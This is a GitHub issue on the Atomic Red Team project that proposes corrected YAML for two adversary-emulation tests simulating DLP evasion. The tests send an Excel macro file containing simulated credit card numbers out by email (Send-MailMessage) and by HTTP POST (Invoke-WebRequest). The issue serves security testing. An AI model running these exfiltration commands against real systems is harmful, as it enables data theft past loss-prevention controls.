### ISSUE TITLE
Problem: T1027 #1469 Test #5 and #6 cannot be executed

### ISSUE THREAD

**Issue by BoBoSiKi008** [redcanaryco/atomic-red-team#1490]
## What did you do?

ℹ Several errors pop up when executing Test #5 and #6 due to incorrect parameters defined in the YAML file T1027.yaml.

## What did you expect to happen?

ℹ Please update Test #5 and #6 with the below content into the YAML file T1027.yaml.

```
- name: DLP Evasion via Sensitive Data in VBA Macro over email
  auto_generated_guid: 129edb75-d7b8-42cd-a8ba-1f3db64ec4ad
  description: |
    Upon successful execution, an excel containing VBA Macro containing sensitive data will be sent outside the network using email.
    Sensitive data includes about around 20 odd simulated credit card numbers that passes the LUHN check.
  supported_platforms:
  - windows
  input_arguments:
    input_file:
      description: Path of the XLSM file
      type: path
      default: PathToAtomicsFolder\T1027\src\T1027-cc-macro.xlsm
    sender:
      description: sender email
      type: string
      default: test@corp.com
    receiver:
      description: receiver email
      type: string
      default: test@corp.com
    smtp_server:
      description: SMTP Server IP Address
      type: string
      default: 127.0.0.1
  executor:
    command: |
      Send-MailMessage -From #{sender} -To #{receiver} -Subject 'T1027_Atomic_Test' -Attachments #{input_file} -SmtpServer #{smtp_server}
    name: powershell

- name: DLP Evasion via Sensitive Data in VBA Macro over HTTP
  auto_generated_guid: e2d85e66-cb66-4ed7-93b1-833fc56c9319
  description: |
    Upon successful execution, an excel containing VBA Macro containing sensitive data will be sent outside the network using HTTP.
    Sensitive data includes about around 20 odd simulated credit card numbers that passes the LUHN check.
  supported_platforms:
  - windows
  input_arguments:
    input_file: 
      description: Path of the XLSM file
      type: path
      default: PathToAtomicsFolder\T1027\src\T1027-cc-macro.xlsm
    ip_address:
      description: Destination IP address
      type: string
      default: 127.0.0.1
  executor:
    command: |
      Invoke-WebRequest -Uri #{ip_address} -Method POST -Body #{input_file}
    name: powershell
```

## Your Environment

* Which *specific* operating system are you running (e.g. Windows 7 SP1 32-bit)?
Windows 10 x64
